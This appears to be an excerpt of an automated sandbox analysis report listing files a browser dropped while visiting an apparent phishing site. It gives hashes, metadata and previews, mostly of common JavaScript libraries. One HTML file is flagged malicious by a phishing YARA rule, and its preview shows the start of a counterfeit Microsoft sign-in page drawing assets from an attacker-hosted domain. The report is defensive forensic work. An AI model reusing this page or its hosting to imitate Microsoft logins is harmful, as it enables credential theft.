                                                  Entropy (8bit):1.7941220937304676
                                                  Encrypted:false
                                                  SSDEEP:96:rJZaZJ2aWftwAfvSe1M82TBHQveLBqMvOD2:rJZaZJ2aWft7fvxMFB1sMW2
                                                  MD5:2376B63DD99A21BB38F9BF23ACF1D86C
                                                  SHA1:F3EE9ACBD213872987FA5432050FF271892F187D
                                                  SHA-256:D6A1B3F79D7C3407BA8B9B9CD25757A3E5812170895353CE52ED68F68510277F
                                                  SHA-512:8E1E94D2B840E1EC005F547CB8382B3DE37B08B788F014B49ED24C80B9CB80025643E15E59990BC6BA5E54E300D8776B2572CE9664D6BC79CC672B8A784DC065
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8DE2B5D7-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):53336
                                                  Entropy (8bit):1.9851223060293122
                                                  Encrypted:false
                                                  SSDEEP:192:rTZwZe2BWCltCxfClLtCl08oyWCy0sYCc0qSCccxtCccNHiLC/cpLCLc5CCLHX2g:rVgVwwOMhxxY5S8a0JLFC9HTi7QTO
                                                  MD5:962274CC1F282531B23203E04357D3FF
                                                  SHA1:6DD72F23F4756D263D6B9880C1D8C3B8D49C1801
                                                  SHA-256:5109A8E77C833CE179D130F375178104C0DE5B989E86CDC3F2512FD41DB3E4EC
                                                  SHA-512:3464C97D984F866A41EC912724AE976E685A982B8698D46ECFF733BDA41C2A531400AC777AA55AED2666CF4AE374EFD0539020DA86A995C8CCD129C1D993A196
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{835A3560-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):19032
                                                  Entropy (8bit):1.5948619844744936
                                                  Encrypted:false
                                                  SSDEEP:48:IwHGcpryGwpaGG4pQWGrapbSqGQpBHGHHpcGTGUpQwlGcpm:rtZ6Q26YBSSjy2W6yg
                                                  MD5:FE6D8E055CF9717ED85F88E719780F49
                                                  SHA1:1E2B740098CFA100B8A1102F04976CE25B481195
                                                  SHA-256:F5D66DB73B3C4FFD1F6576A80E5A7B4772674184347BC82C0397063F64B1ACB7
                                                  SHA-512:554DE6C13F63040DA95E51AD26D81944201566DBFD45002A7E9FB49DF24515489E1A4EF392415738524AAF8D454AC4C575BF13E2676DA5616AAED960D8E56C87
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8DE2B5D9-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):28278
                                                  Entropy (8bit):2.1178792382736584
                                                  Encrypted:false
                                                  SSDEEP:96:rhZWQSeK1W6VWJC9o8/InnIIHnIm3pZr3wBq9ftr:rhZWQSeKk6EJC9o8/InnhHnrpZjltr
                                                  MD5:4CA8594CFF927437BF6C362441A1076E
                                                  SHA1:EF5D5F3EA6921532416F9F11F896F548B5C59521
                                                  SHA-256:0A019F360D7F50BED6A4A7167FBB8F259719AD3AD056743C95CE43B3D7F3551B
                                                  SHA-512:D3BE21DC29B842C29967E012D80946D7ABCAC2EE48769B576C0DE4BCFA0ABF07A56A04E502CF5220DD07CBBF1EF27A03B19A83973A2481E6B2E6920280C95CA9
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99A12787-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):28278
                                                  Entropy (8bit):2.12104244892328
                                                  Encrypted:false
                                                  SSDEEP:96:rVPZHqQieu1WQVWjCDoc/MnyIxHyIm3kZr3SBqxMtr:rBZKQieukQEjCDoc/MnykHyrkZjwtr
                                                  MD5:8ECC059DB7B7A31E416156DB10FB5F84
                                                  SHA1:87C27E185997DBDE9CC312AB57EF2B63121D386A
                                                  SHA-256:622525EC9D53C63D863BCF423B6CAE7F2BAFD3CB85B1207E6F4BB868FD785FDB
                                                  SHA-512:C9C0776427D6587266A15F91B382AC070FC1B1D05EB215A4F8EA703551A6BC46F123F9AE1A81E1767A4EECDF3ED53316ADF98CC04448F47E01B957C9BA2F2458
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99A12788-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):27998
                                                  Entropy (8bit):2.122018630942539
                                                  Encrypted:false
                                                  SSDEEP:96:rXZIQaeK1WUHP2vwWo434uIOYuIm3kZr37BqQxtr:rXZIQaeKkUHP2vwT434uDYurkZjntr
                                                  MD5:1AD682CA83D8C4403BDE9044255EF56F
                                                  SHA1:7C7C3A56DC6F7EAB23051BE9D7808EFFA7AD97C8
                                                  SHA-256:04CF35A9D86D9FF37FFC5C0D083E8478E6D499C7DA1987FD8AB71CC9CD8C95B9
                                                  SHA-512:EAF6CCF3A8A70FC73D7476BAD1182B282CAB0ECF86A249C30BFF362D992CB5EDABDBA2D58F3F6BB9E497F0D74371C0B1047F587A3C923F73410B0A6D064FEE81
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A0830FD3-7633-11EB-90E5-ECF4BB2D2496}.dat
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:Microsoft Word Document
                                                  Category:dropped
                                                  Size (bytes):16984
                                                  Entropy (8bit):1.5643524552422585
                                                  Encrypted:false
                                                  SSDEEP:48:IwTGcprWhGwpanG4pQfGrapbSU7GQpK6G7HpRYTGIpG:rpZuQJ6jBSU1AVT8A
                                                  MD5:5D470E0EFBEB7860B03120EF2857313B
                                                  SHA1:F84CE169B659DDAEC3A17574F845303D9D03E44A
                                                  SHA-256:8D3EF8C21AD52E5F6CE7F46FFF8DDD4FA4A256504353495ED9079DEA8FBC5F6E
                                                  SHA-512:6B4E40C822D9FBC1C6E4E71529DE5F89D5CB3B14D9C479F2E9E6213CD104A9C3B34099715601F0864CF65B73C446C280B84242589932CB692673EF64872BFF1A
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\favicons[1].png
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):492
                                                  Entropy (8bit):7.443140866786406
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
                                                  MD5:3CA64F83FDCF25135D87E08AF65E68C9
                                                  SHA1:B82D0979D555BD137B33C15021129E06CBEEA59A
                                                  SHA-256:2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
                                                  SHA-512:7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://www.google.com/s2/favicons?sz=64&domain_url=murexltd.com
                                                  Preview: .PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\popper.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):20495
                                                  Entropy (8bit):5.217693761954058
                                                  Encrypted:false
                                                  SSDEEP:384:f5LFrVVVnCQvIR/CFU4hHPV4kdxXvYqo2D75zCx+vI2am3MxGpGTgd/9jt9+Db9A:hNVVVnyiU41xXvlD7wx+v0xyGTgnZO9A
                                                  MD5:6B08DDC901000D51FA1F06A35518F302
                                                  SHA1:BAFE987C18CBE0587DE3E6360E7DA40A2885614B
                                                  SHA-256:02835066969199E9924F1332F7172A5D7E552F023A20C3D8BA03BB6C51CE5BE5
                                                  SHA-512:7A97FA1CF4A12D0F338090F8A4FFAD48D91843D6955304DE5F6208DE394642B0B412D6FD30D7A880CAD92200A8F7F2005C40324BCCE3CFEDA7B14A57DFF098CA
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
                                                  Preview: /*. Copyright (C) Federico Zivolo 2018. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){if(!e)return document.documentElement;for(var o=ie(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&'BODY'!==i&&'HTM
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\style[1].css
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):16331
                                                  Entropy (8bit):5.319200830403511
                                                  Encrypted:false
                                                  SSDEEP:192:yqVC6VfZfqZp+VvNmdW3WcWY6TLMPbUZ70PIj+IgUgX9aG+0F4jwvUZIhAjwGpP+:y36Zf6kmv7Hvo9Z+0WjwIIh5GZRgf
                                                  MD5:3BD33314562B431BB47EF0CCB7ECCC62
                                                  SHA1:93171B5D03DA9D63AC3BA80187159A9F9D5022D6
                                                  SHA-256:D95C9920A34DF7714EADB1257094981FDD5A596D2B1C80E3A9278F02D1AEE9A1
                                                  SHA-512:2A4857C5B4E4F632C9252EF8922BB3B0399883C7273A58BBC0E6A73094165B0EEE8BA2A2A5CAEEFBE6C335ECD1DCE9473500DDA0C4B8DEA9F60FFE973DF94627
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://manmedia.org/offic/n.page/style.css
                                                  Preview: color{...color:rgba(196,91,219,0.1);...color:rgba(196,91,219,0.2);...color:rgba(196,91,219,0.3);...color:rgba(196,91,219,0.4);...color:rgba(196,91,219,0.5);...color:rgba(196,91,219,0.6);...color:rgba(196,91,219,0.7);...color:rgba(196,91,219,0.8);...color:rgba(196,91,219,0.9);...color:rgba(196,91,219,1);......background-color:-webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), color-stop(25%, #ffffff), to(#e6e6e6));...background-color:-webkit-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...background-color:-moz-linear-gradient(top, #ffffff, #ffffff 25%, #e6e6e6);...background-color:-ms-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...background-color: linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6e6e6', GradientType=0);.........}....html, body, div, span, applet, object, iframe,..h1, h2, h3, h4, h5, h6, p, blockquote, pre,..a, abbr, acronym, address, big, cite, code,..del, dfn, em, img, i
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):255366
                                                  Entropy (8bit):6.093517370301889
                                                  Encrypted:false
                                                  SSDEEP:6144:SWqmT2RmEb2oUp9M5WnwGJUQo7xKOFqqbgvHzy8H0WqmT2RmEb2oUp9M5WnwGJUh:8WM5LGk1kcWM5LGk1km
                                                  MD5:99A747B517553FEDEA4E383A3B257FB3
                                                  SHA1:A1CED03F68CAFEEAED72CC4184788109B1500954
                                                  SHA-256:FC09B0D19EE905B6CDEC8D0FC94ED424EDBA006BE87F702834D85176E703BE12
                                                  SHA-512:04D37CEFDBA3998BC71ECBBCF2CDBB4E9F6FDD10A2E27E1A8B57FDAA19546DC49851D58A0ABB0A57A31B1F43C793AADBF567D423F8997A694547DF88C88A10B8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html, Author: Joe Security
                                                  Reputation:low
                                                  Preview: ....<html dir="ltr" class="" lang="en">....<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="ConvergedSignIn">.. <meta name="SiteID" content="">.. <meta name="ReqLC" content="1033">.. <meta name="LocLC" content="en-US">.. <meta name="title" content="ES6-CrawlerDetect">.. .... <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">..<link rel="stylesheet" href="https://manmedia.org/offic/n.page/style.css" />.. <meta name="robots" content="none">..<script type="text/javascript" src="https://manmedia.org/of
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\bootstrap.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):50676
                                                  Entropy (8bit):5.276454699305197
                                                  Encrypted:false
                                                  SSDEEP:768:D2Ybgh0GBxTHVmcmjWSLsynS/zZ/AcyUenY8yiKKdHPPm26Ro1FH4nx46:D2jh02Lh+SbZ/AbYqdm2mx46
                                                  MD5:CE6E785579AE4CB555C9DE311D1B9271
                                                  SHA1:5EF2C15B47D7290698C737676BA9C3056B45F2E8
                                                  SHA-256:0BCA10549DF770AB6790046799E5A9E920C286453EBBB2AFB0D3055339245339
                                                  SHA-512:A601871568C1B5B2874D30D6E5BB8667D994D2719FC4D6AF7F99162BF39DDAE800FFFF45B8C1C0BA790088C7B98DE2FFE565B5AF4531C0A8BA0F92E930E243DF
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
                                                  Preview: /*!. * Bootstrap v4.1.0 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,c){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function h(r){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{},e=Object.keys(s);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(s).filter(function(t){return Object.getOwnPropertyDescriptor(s,t).enum
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jquery-3.3.1.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):86927
                                                  Entropy (8bit):5.289226719276158
                                                  Encrypted:false
                                                  SSDEEP:1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
                                                  MD5:A09E13EE94D51C524B7E2A728C7D4039
                                                  SHA1:0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
                                                  SHA-256:160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
                                                  SHA-512:F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js
                                                  Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jquery-3.3.1.slim.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):69917
                                                  Entropy (8bit):5.290926894311774
                                                  Encrypted:false
                                                  SSDEEP:1536:hLiMgk2gULYoXUmZx6+VWNL0kC8W90qU9JR7hDqEDqWSNB1gZFy/HG+FP:I8w0qU9JTtH3aP
                                                  MD5:99B0A83CF1B0B1E2CB16041520E87641
                                                  SHA1:BC5836992C0B260496BA520FE1336D499BF06EB7
                                                  SHA-256:DDE76B9B2B90D30EB97FC81F06CAA8C338C97B688CEA7D2729C88F529F32FBB1
                                                  SHA-512:33EA8C2353C745C61C3A927378995A59B555C76249C8F23065AB3CA2BEDD73DECB64EA248EF6E97D1C729A156D9492F28E2177C06CABD0524E0380CB38D2D52F
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://code.jquery.com/jquery-3.3.1.slim.min.js
                                                  Preview: /*! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,u=n.push,s=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,d=f.toString,p=d.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},v=function e(t){return null!=t&&t===t.window},y={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in y)n[i]&&(o[i]=n[i]);t.head.a
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\favicons[1].png
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):492
                                                  Entropy (8bit):7.443140866786406
                                                  Encrypted:false
                                                  SSDEEP:12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
                                                  MD5:3CA64F83FDCF25135D87E08AF65E68C9
                                                  SHA1:B82D0979D555BD137B33C15021129E06CBEEA59A
                                                  SHA-256:2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
                                                  SHA-512:7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
                                                  Malicious:false
                                                  Reputation:low
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jquery.min[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                  Category:downloaded
                                                  Size (bytes):93868
                                                  Entropy (8bit):5.372204012865564
                                                  Encrypted:false
                                                  SSDEEP:1536:k5RKUpVgklsdbuLP/l+0fGzA8gmtasgx/c9Rzzi4yff8qeLvHHEjam7rSnmBn9gn:Ee8FbGzA81+xRRi1Z3
                                                  MD5:DDB84C1587287B2DF08966081EF063BF
                                                  SHA1:9EB9AC595E9B5544E2DC79FFF7CD2D0B4B5EF71F
                                                  SHA-256:88171413FC76DDA23AB32BAA17B11E4FFF89141C633ECE737852445F1BA6C1BD
                                                  SHA-512:0640605A22F437F10521B2D96064E06E4B0A1B96D2E8FB709D6BD593781C72FF8A86D2BFE3090BC4244687E91E94A897C7B132E237D369B2E0DC01083C2EC434
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
                                                  Preview: /*! jQuery v1.7.1 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jqueryLib[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):86663
                                                  Entropy (8bit):5.368302777291146
                                                  Encrypted:false
                                                  SSDEEP:1536:TNhEyjjTikEJO4edXXe9J578go6MWX2xkjde4c4j2ll2AckaXE46n15HZ+FhFcQ+:Vxc2yji4j2uC/kcQDU8CuE
                                                  MD5:473957CFB255A781B42CB2AF51D54A3B
                                                  SHA1:67BDACBD077EE59F411109FD119EE9F58DB15A5F
                                                  SHA-256:75B707D8761E2BFBD25FBD661F290A4F7FD11C48E1BF53A36DC6BD8A0034FA35
                                                  SHA-512:20DA3FE171C075635EF82F8DE57644C7A50BE45EB1207D96A51B5EADEAAC17EE830B5058D87E88501E20EC41EF897F65CEC26A0380EAF49698C6EAA5981D8483
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://manmedia.org/offic/n.page/jqueryLib.js
                                                  Preview: /*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */..!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){va
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2_bc3d32a696895f78c19df6c717586a5d[1].svg
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):1864
                                                  Entropy (8bit):5.222032823730197
                                                  Encrypted:false
                                                  SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
